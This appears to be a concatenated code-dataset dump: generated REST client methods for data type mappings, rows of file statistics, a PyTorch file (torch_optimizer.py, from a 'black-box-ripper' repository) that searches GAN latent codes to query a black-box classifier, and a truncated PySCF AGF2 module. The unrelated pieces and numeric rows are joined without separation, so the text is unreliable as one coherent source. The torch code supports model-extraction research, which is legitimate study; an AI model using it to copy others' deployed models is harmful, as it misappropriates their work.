def list_transformations_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""ListTransformations # noqa: E501
List transformations for a type mapping from storage. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_transformations_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: ListTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_transformations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `list_transformations`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `list_transformations`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `list_transformations`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""RetrieveDataTypeMapping # noqa: E501
Retrieve a data type mapping # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: GetDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def retrieve_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""RetrieveDataTypeMapping # noqa: E501
Retrieve a data type mapping # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: GetDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `retrieve_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `retrieve_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `retrieve_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""UpdateDataTypeMapping # noqa: E501
Updates a data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param TypeMapping body:
:return: UpdateDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def update_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""UpdateDataTypeMapping # noqa: E501
Updates a data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param TypeMapping body:
:return: UpdateDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `update_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `update_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `update_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_transformation(self, body, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""UpdateTransformation # noqa: E501
Update a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_transformation(body, container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: UpdateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
else:
(data) = self.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
return data
def update_transformation_with_http_info(self, body, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""UpdateTransformation # noqa: E501
Update a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: UpdateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'container_id', 'data_source_id', 'mapping_id', 'transformation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'transformation_id' is set
if ('transformation_id' not in params or
params['transformation_id'] is None):
raise ValueError("Missing the required parameter `transformation_id` when calling `update_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
if 'transformation_id' in params:
path_params['transformation_id'] = params['transformation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations/{transformation_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.700658
| 1,455
| 0.647455
| 6,816
| 58,004
| 5.240757
| 0.051643
| 0.044792
| 0.057109
| 0.041152
| 0.934996
| 0.927914
| 0.92405
| 0.920495
| 0.919263
| 0.918703
| 0
| 0.014778
| 0.267378
| 58,004
| 1,215
| 1,456
| 47.739918
| 0.825815
| 0.345287
| 0
| 0.783784
| 0
| 0
| 0.265706
| 0.086068
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031532
| false
| 0
| 0.031532
| 0
| 0.10961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f41e2e640a9aa2a089cf5436a377f319e2900b02
| 14,899
|
py
|
Python
|
torch_optimizer.py
|
antoniobarbalau/black-box-ripper
|
f461e140979bf43200bd4ec6872731f07a2ca15f
|
[
"CC0-1.0"
] | 22
|
2020-10-30T02:36:44.000Z
|
2022-03-21T12:56:45.000Z
|
torch_optimizer.py
|
antoniobarbalau/black-box-ripper
|
f461e140979bf43200bd4ec6872731f07a2ca15f
|
[
"CC0-1.0"
] | 1
|
2021-04-06T15:12:22.000Z
|
2021-04-24T11:51:22.000Z
|
torch_optimizer.py
|
antoniobarbalau/black-box-ripper
|
f461e140979bf43200bd4ec6872731f07a2ca15f
|
[
"CC0-1.0"
] | 2
|
2021-05-27T02:16:54.000Z
|
2021-09-03T23:34:09.000Z
|
import numpy as np
import torch
import setup
def loss(softmax, image, label):
softmax = np.exp(softmax) / np.sum(np.exp(softmax))
return np.sum(np.power(
softmax -
np.eye(10)[label],
2
))
def optimize_to_grayscale(classifier, generator, batch_size = 64, encoding_size = 128):
batch = []
n_iter = batch_size
for i in range(n_iter):
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .9 and x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().cuda())
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum((1,), keepdim = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
c = softmaxes[indexes[0]][label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
def optimize_rescale(classifier, generator, batch_size = 16):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 512
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (20, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .90 and x < 3:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float())
images = torch.nn.functional.interpolate(images, size = 224)
# multipliers = [.2126, .7152, .0722]
# multipliers = np.expand_dims(multipliers, 0)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.tile(multipliers, [1, 1, 32, 32])
# multipliers = torch.Tensor(multipliers).to(device)
# images = images * multipliers
# images = images.sum(axis = 1, keepdims = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
])
c = softmaxes[indexes[0]][label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
def optimize(classifier, generator, batch_size = 64):
batch = []
n_iter = batch_size
encoding_size =256
if 'sngan' in str(type(generator)):
encoding_size = 128
for i in range(n_iter):
c = 0.
x = 0
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
label = np.random.randint(10, size = (1, 1))
while c < .9 and x < 300:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
# multipliers = [.2126, .7152, .0722]
# multipliers = np.expand_dims(multipliers, 0)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.expand_dims(multipliers, -1)
# multipliers = np.tile(multipliers, [1, 1, 32, 32])
# multipliers = torch.Tensor(multipliers).to(device)
# images = images * multipliers
# images = images.sum(axis = 1, keepdims = True)
softmaxes = classifier(images).detach().cpu()
losses = [loss(np.array(s), i, label) for s, i in zip(softmaxes, images)]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
c = softmaxes[indexes[0]].numpy()
c = c[label]
batch.append(image)
return torch.cat(batch)#, axis = 0)
def discrepancy_loss(teacher_predictions, student_predictions):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return -np.sum(np.square(teacher_softmax - student_softmax))
def optimize_discrepancies(teacher, student, generator, batch_size = 16):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
while x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
discrepancy_loss(np.array(s), np.array(i))
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
return torch.cat(batch, axis = 0)
def discrepancy_loss_kl(teacher_predictions, student_predictions):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return -np.sum(teacher_softmax * np.log(teacher_softmax) / np.log(student_softmax))
def optimize_discrepancies_kl(teacher, student, generator, batch_size = 64):
batch = []
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
while x < 50:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().to(setup.device))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
discrepancy_loss_kl(np.array(s), np.array(i))
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
print('image')
return torch.cat(batch, axis = 0)
def loss(softmax, image, label):
softmax = np.exp(softmax) / np.sum(np.exp(softmax))
return np.sum(np.power(
softmax -
np.eye(10)[label],
2
))
def optimize_discrepancies_(teacher, student, generator, batch_size = 64):
encoding_size = 128
batch_size = 16
with torch.no_grad():
specimens = torch.tensor(
np.random.uniform(-3.3, 3.3, size = (batch_size, 30, encoding_size))
).float().to(setup.device)
for _ in range(10):
images = generator(specimens.view(-1, encoding_size))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = torch.softmax(
teacher(images), axis = -1
).detach().cpu()
student_predictions = torch.softmax(
student(images), axis = -1
).detach().cpu()
losses = -1. * torch.pow(
teacher_predictions - student_predictions, 2
).sum(-1).view(batch_size, 30)
indexes = torch.argsort(losses) < 10
specimens = specimens[indexes].view(batch_size, 10, encoding_size)
specimens = torch.cat((
specimens,
specimens + torch.randn(batch_size, 10, encoding_size).to(setup.device),
specimens + torch.randn(batch_size, 10, encoding_size).to(setup.device),
), axis = 1)
images = generator(specimens.view(-1, encoding_size))
images = generator(specimens.view(-1, encoding_size))
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = torch.softmax(
teacher(images), axis = -1
).detach().cpu()
student_predictions = torch.softmax(
student(images), axis = -1
).detach().cpu()
losses = -1. * torch.pow(
teacher_predictions - student_predictions, 2
).sum(-1).view(batch_size, 30)
indexes = torch.argsort(losses) < 1
images = images.view(batch_size, 30, 1, 32, 32)[indexes]
return images
def curriculum_loss(teacher_predictions, student_predictions, label, weight):
teacher_softmax = np.exp(teacher_predictions) / np.sum(
np.exp(teacher_predictions)
)
student_softmax = np.exp(student_predictions) / np.sum(
np.exp(student_predictions)
)
return (
np.sum(np.square(teacher_softmax - label)) -
weight * np.sum(np.square(teacher_softmax - student_softmax))
)
def optimize_curriculum(teacher, student, generator, epoch, batch_size = 16):
batch = []
weights = [0.] * 4 + list(np.linspace(0, 1., 46)) + [1.] * 200
n_iter = batch_size
for i in range(n_iter):
encoding_size = 128
specimens = np.random.uniform(-3.3, 3.3, size = (30, encoding_size))
x = 0
label = np.eye(10)[np.random.randint(10)]
while x < 10:
x += 1
encodings = specimens
with torch.no_grad():
images = generator(torch.tensor(
specimens
).float().cuda())
multipliers = [.2126, .7152, .0722]
multipliers = np.expand_dims(multipliers, 0)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.expand_dims(multipliers, -1)
multipliers = np.tile(multipliers, [1, 1, 32, 32])
multipliers = torch.Tensor(multipliers).to(setup.device)
images = images * multipliers
images = images.sum(axis = 1, keepdims = True)
teacher_predictions = teacher(images).detach().cpu()
student_predictions = student(images).detach().cpu()
losses = [
curriculum_loss(np.array(s), np.array(i), label, weights[epoch])
for s, i in zip(
teacher_predictions, student_predictions
)
]
indexes = np.argsort(losses)
image = images[indexes[0]: indexes[0] + 1]
specimens = specimens[indexes[:10]]
specimens = np.concatenate([
specimens,
specimens + np.random.normal(scale = .5, size = (10, encoding_size)),
specimens + np.random.normal(scale = .5, size = (10, encoding_size))
])
batch.append(image)
return torch.cat(batch, axis = 0)
| 39.625
| 88
| 0.549299
| 1,617
| 14,899
| 4.958565
| 0.074212
| 0.047892
| 0.056872
| 0.068845
| 0.9223
| 0.906086
| 0.90434
| 0.896732
| 0.874158
| 0.8668
| 0
| 0.0434
| 0.331901
| 14,899
| 375
| 89
| 39.730667
| 0.762106
| 0.049466
| 0
| 0.799373
| 0
| 0
| 0.000707
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037618
| false
| 0
| 0.009404
| 0
| 0.08464
| 0.003135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4629fa1cbf96ac21825df8acee9f4b3adc7d0eb
| 18,199
|
py
|
Python
|
pyscf/agf2/_agf2.py
|
QuESt-Calculator/pyscf
|
0ed03633b699505c7278f1eb501342667d0aa910
|
[
"Apache-2.0"
] | 501
|
2018-12-06T23:48:17.000Z
|
2022-03-31T11:53:18.000Z
|
pyscf/agf2/_agf2.py
|
QuESt-Calculator/pyscf
|
0ed03633b699505c7278f1eb501342667d0aa910
|
[
"Apache-2.0"
] | 710
|
2018-11-26T22:04:52.000Z
|
2022-03-30T03:53:12.000Z
|
pyscf/agf2/_agf2.py
|
QuESt-Calculator/pyscf
|
0ed03633b699505c7278f1eb501342667d0aa910
|
[
"Apache-2.0"
] | 273
|
2018-11-26T10:10:24.000Z
|
2022-03-30T12:25:28.000Z
|
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Oliver J. Backhouse <olbackhouse@gmail.com>
# Alejandro Santana-Bonilla <alejandro.santana_bonilla@kcl.ac.uk>
# George H. Booth <george.booth@kcl.ac.uk>
#
import numpy as np
import ctypes
from pyscf import lib
from pyscf.agf2 import mpi_helper
libagf2 = lib.load_library('libagf2')
def cholesky_build(vv, vev, eps=1e-16):
''' Constructs the truncated auxiliaries from :attr:`vv` and :attr:`vev`.
Performs a Cholesky decomposition via :func:`numpy.linalg.cholesky`,
for a positive-definite or positive-semidefinite matrix. For the
latter, the null space is removed.
The :attr:`vv` matrix of :func:`build_se_part` can be positive-
semidefinite when :attr:`gf_occ.naux` < :attr:`gf_occ.nphys` for
the occupied self-energy, or :attr:`gf_vir.naux` < :attr:`gf_vir.nphys`
for the virtual self-energy.
'''
nmo = vv.shape[0]
try:
b = np.linalg.cholesky(vv).T
except np.linalg.LinAlgError:
w, v = np.linalg.eigh(vv)
w[w < eps] = eps
vv_posdef = np.dot(np.dot(v, np.diag(w)), v.T.conj())
b = np.linalg.cholesky(vv_posdef).T
b_inv = np.linalg.inv(b)
m = np.dot(np.dot(b_inv.T, vev), b_inv)
e, c = np.linalg.eigh(m)
c = np.dot(b.T, c[:nmo])
return e, c
def build_mats_ragf2_incore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wraps AGF2ee_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2ee_vv_vev_islice')
assert qeri.ndim == 4
nmo = qeri.shape[0]
nocc = e_occ.size
nvir = e_vir.size
qeri = np.asarray(qeri, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * nocc // size
iend = nocc if rank == (size-1) else (rank+1) * nocc // size
fdrv(qeri.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_ragf2_outcore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2ee_vv_vev_islice to support outcore
'''
assert qeri.ndim == 4
nmo = qeri.shape[0]
nocc = e_occ.size
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fpos = os_factor + ss_factor
fneg = -ss_factor
